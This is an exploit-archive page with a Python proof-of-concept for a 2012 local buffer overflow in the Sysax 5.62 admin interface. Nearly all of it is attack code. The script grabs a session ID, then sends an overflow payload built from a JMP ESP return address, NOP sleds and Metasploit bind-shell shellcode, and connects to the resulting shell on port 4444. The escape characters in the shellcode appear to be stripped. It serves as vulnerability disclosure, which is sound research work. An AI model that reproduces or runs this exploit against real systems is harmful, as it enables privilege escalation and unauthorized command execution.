Home / exploits Sysax 5.62 Admin Interface Local Buffer Overflow
Posted on 20 June 2012
#!/usr/bin/python ########################################################################################################## #Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit #Date Discovered: June 15, 2012 #Vendor Contacted: June 19, 2012 #Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html ########################################################################################################## import socket,sys,time,re,base64,subprocess def main(): global login print " " print "****************************************************************************" print " Sysax <= 5.62 Admin Interface Local Buffer Overflow " print " by @cd1zz www.pwnag3.com " print "****************************************************************************" #initial GET login = "GET /scgi? HTTP/1.1 " login +="Host: localhost:88 " login += "Referer: http://localhost:88 " try: r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) print "[+] Accessing admin interface" r.send(login) except Exception, e: print "[-] There was a problem" print e #loop the recv sock so we get the full page page = '' fullpage = '' while "</html>" not in fullpage: page = r.recv(4096) fullpage += page time.sleep(1) #regex the sid from the page global sid sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M) if sid is None: print "[-] There was a problem finding your SID" sys.exit(1) time.sleep(1) r.close() def exploit(): #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "x00x0ax0d" shell = ( "xdbxd5xd9x74x24xf4xb8xc3x8fxb3x3ex5bx33xc9" "xb1x56x31x43x18x03x43x18x83xebx3fx6dx46xc2" "x57xfbxa9x3bxa7x9cx20xdex96x8ex57xaax8ax1e" "x13xfex26xd4x71xebxbdx98x5dx1cx76x16xb8x13" "x87x96x04xffx4bxb8xf8x02x9fx1axc0xccxd2x5b" "x05x30x1cx09xdex3ex8exbex6bx02x12xbexbbx08" "x2axb8xbexcfxdex72xc0x1fx4ex08x8ax87xe5x56" "x2bxb9x2ax85x17xf0x47x7exe3x03x81x4ex0cx32" "xedx1dx33xfaxe0x5cx73x3dx1ax2bx8fx3dxa7x2c" "x54x3fx73xb8x49xe7xf0x1axaax19xd5xfdx39x15" "x92x8ax66x3ax25x5ex1dx46xaex61xf2xcexf4x45" "xd6x8bxafxe4x4fx76x1ex18x8fxdexffxbcxdbxcd" "x14xc6x81x99xd9xf5x39x5ax75x8dx4ax68xdax25" "xc5xc0x93xe3x12x26x8ex54x8cxd9x30xa5x84x1d" "x64xf5xbexb4x04x9ex3ex38xd1x31x6fx96x89xf1" "xdfx56x79x9ax35x59xa6xbax35xb3xd1xfcxfbxe7" "xb2x6axfex17x25x37x77xf1x2fxd7xd1xa9xc7x15" "x06x62x70x65x6cxdex29xf1x38x08xedxfexb8x1e" "x5ex52x10xc9x14xb8xa5xe8x2bx95x8dx63x14x7e" "x47x1axd7x1ex58x37x8fx83xcbxdcx4fxcdxf7x4a" "x18x9axc6x82xccx36x70x3dxf2xcaxe4x06xb6x10" "xd5x89x37xd4x61xaex27x20x69xeax13xfcx3cxa4" "xcdxbax96x06xa7x14x44xc1x2fxe0xa6xd2x29xed" "xe2xa4xd5x5cx5bxf1xeax51x0bxf5x93x8fxabxfa" "x4ex14xdbxb0xd2x3dx74x1dx87x7fx19x9ex72x43" "x24x1dx76x3cxd3x3dxf3x39x9fxf9xe8x33xb0x6f" "x0exe7xb1xa5") nops = "x90" * 20 #7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072 jmp_esp = "x87xA7xA7x7C" payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops)) #setup exploit exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1 " exploit += "Host: localhost:88 " exploit += "Content-Type: application/x-www-form-urlencoded " exploit += "Content-Length: "+ str(len(payload)+3)+" " exploit += "e2="+payload+" " try: r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) print "[+] Sending pwnag3" r.send(exploit) except Exception, e: print "[-] There was a problem" print e time.sleep(2) print "[+] Here is your shell..." subprocess.Popen("telnet localhost 4444", shell=True).wait() sys.exit(1) if __name__ == '__main__': if len(sys.argv) != 1: print "[-] Usage: %s" sys.exit(1) #by default it binds to 127.0.0.1 on 88 target = "127.0.0.1" port = 88 main() exploit()
